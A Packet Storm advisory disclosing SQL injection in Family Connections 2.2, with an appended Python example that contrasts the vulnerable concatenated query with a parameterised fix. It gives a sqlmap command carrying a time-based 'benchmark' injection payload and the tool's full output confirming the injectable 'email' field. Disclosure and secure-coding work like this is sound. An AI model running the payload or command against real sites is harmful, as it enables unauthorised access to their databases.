Family Connections 2.2 SQL Injection

2010-03-16T00:00:00
ID PACKETSTORM:87313
Type packetstorm
Reporter Blake
Modified 2010-03-16T00:00:00

Description

# Exploit Title: Family Connections version 2.2 SQL Injection  
# Date: March 15, 2010  
# Author: Blake  
# Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.2/FCMS_2.2.zip/download  
# Version: version 2.2  
# Tested on: Windows XP SP3  
  
Multiple SQL injection vulnerabilities exist in register.php and lostpw.php; the user-supplied form fields reach the database query without proper escaping or parameterisation. Example with sqlmap against register.php:  
  
sqlmap -u "http://192.168.1.149/fcms/register.php" --method "POST" --data "username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23&lname=on&fname=on&password=on&email=on&submit=Submit"  
  
sqlmap/0.6.4 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>  
and Daniele Bellucci <daniele.bellucci@gmail.com>  
  
[*] starting at: 16:39:13  
  
[16:39:13] [INFO] testing connection to the target url  
[16:39:41] [INFO] testing if the url is stable, wait a few seconds  
[16:40:37] [INFO] url is stable  
[16:40:37] [INFO] testing if POST parameter 'username' is dynamic  
[16:40:38] [WARNING] POST parameter 'username' is not dynamic  
[16:40:38] [INFO] testing if POST parameter 'submit' is dynamic  
[16:41:05] [WARNING] POST parameter 'submit' is not dynamic  
[16:41:05] [INFO] testing if POST parameter 'lname' is dynamic  
[16:41:33] [WARNING] POST parameter 'lname' is not dynamic  
[16:41:33] [INFO] testing if POST parameter 'fname' is dynamic  
[16:42:00] [WARNING] POST parameter 'fname' is not dynamic  
[16:42:00] [INFO] testing if POST parameter 'password' is dynamic  
[16:42:27] [WARNING] POST parameter 'password' is not dynamic  
[16:42:27] [INFO] testing if POST parameter 'email' is dynamic  
[16:42:57] [INFO] confirming that POST parameter 'email' is dynamic  
[16:43:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request  
[16:44:28] [INFO] POST parameter 'email' is dynamic  
[16:44:28] [INFO] testing sql injection on POST parameter 'email' with 0 parenthesis  
[16:44:28] [INFO] testing unescaped numeric injection on POST parameter 'email'  
[16:44:57] [INFO] POST parameter 'email' is not unescaped numeric injectable  
[16:44:57] [INFO] testing single quoted string injection on POST parameter 'email'  
[16:45:54] [INFO] confirming single quoted string injection on POST parameter 'email'  
[16:46:23] [INFO] POST parameter 'email' is single quoted string injectable with 0 parenthesis  
[16:46:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic  
[16:46:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic  
[16:46:50] [INFO] testing for parenthesis on injectable parameter  
[16:48:18] [INFO] the injectable parameter requires 0 parenthesis  
[16:48:18] [INFO] testing MySQL  
[16:48:46] [INFO] confirming MySQL  
[16:49:13] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1  
[16:49:13] [INFO] retrieved: 5  
[16:55:25] [INFO] performed 13 queries in 371 seconds  
[16:55:25] [INFO] the back-end DBMS is MySQL  
web server operating system: Windows  
web application technology: PHP 5.3.1, Apache 2.2.14  
back-end DBMS: MySQL >= 5.0.0  
  
  
[*] shutting down at: 16:55:25  
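The sqlmap run above flags the `email` parameter as "single quoted string injectable": a quote in the input closes the string literal the application builds around it, and whatever follows is parsed as SQL. The block below is an added illustration, not code from Family Connections or from the advisory, showing that pattern next to its fix. It assumes a hypothetical `users` table on an in-memory SQLite database (the real FCMS schema is not on the page) and reuses the advisory's own POST body as sample input; `EMAIL_RE` is a deliberately simple format check, not a substitute for parameterised queries.

```python
import re
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Constructed sample schema; the real FCMS table layout is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.execute("INSERT INTO users (username, email) VALUES ('alice', 'alice@example.com')")
    conn.commit()
    return conn


def email_taken_unsafe(conn, email):
    """The injectable pattern: user input is spliced into the SQL text.
    A single quote in `email` ends the string literal and the remainder of
    the input becomes SQL, which is what sqlmap's 'single quoted string
    injection' test detects (here it surfaces as a parse error)."""
    sql = "SELECT COUNT(*) FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchone()[0] > 0


def email_taken_safe(conn, email):
    """Hardened version: the value is passed as a bound parameter, so a
    quote is data, never syntax. Same query, same result for normal input."""
    sql = "SELECT COUNT(*) FROM users WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone()[0] > 0


# Hypothetical defence-in-depth check for the registration form: reject
# values that cannot be an address before they reach the database layer.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+\-']+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}$")


def valid_email(value):
    return EMAIL_RE.fullmatch(value) is not None


def probe(conn, fn, email):
    """Run a lookup and report whether the input broke the query."""
    try:
        return ("ok", fn(conn, email))
    except sqlite3.OperationalError as exc:
        return ("sql_error", str(exc))


# The POST body from the advisory's sqlmap command, used here as sample input.
POST_BODY = ("username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23"
             "&lname=on&fname=on&password=on&email=on&submit=Submit")


def decoded_field(body, name):
    """Decode one form field the way the PHP side would see it."""
    return parse_qs(body, keep_blank_values=True)[name][0]


if __name__ == "__main__":
    db = make_db()
    samples = ("alice@example.com",          # ordinary address
               "o'brien@example.com",        # legitimate address containing a quote
               decoded_field(POST_BODY, "username"))  # the advisory's payload, decoded
    for who in samples:
        print(repr(who), "valid:", valid_email(who),
              "unsafe:", probe(db, email_taken_unsafe, who),
              "safe:", probe(db, email_taken_safe, who))
```

Note that the unsafe query fails on a perfectly legitimate address such as `o'brien@example.com`: the same defect that sqlmap exploits is also a functional bug, which is a useful argument when prioritising the fix. The parameterised version treats every value, including the advisory's `benchmark(...)` payload, as an opaque string and simply returns no match.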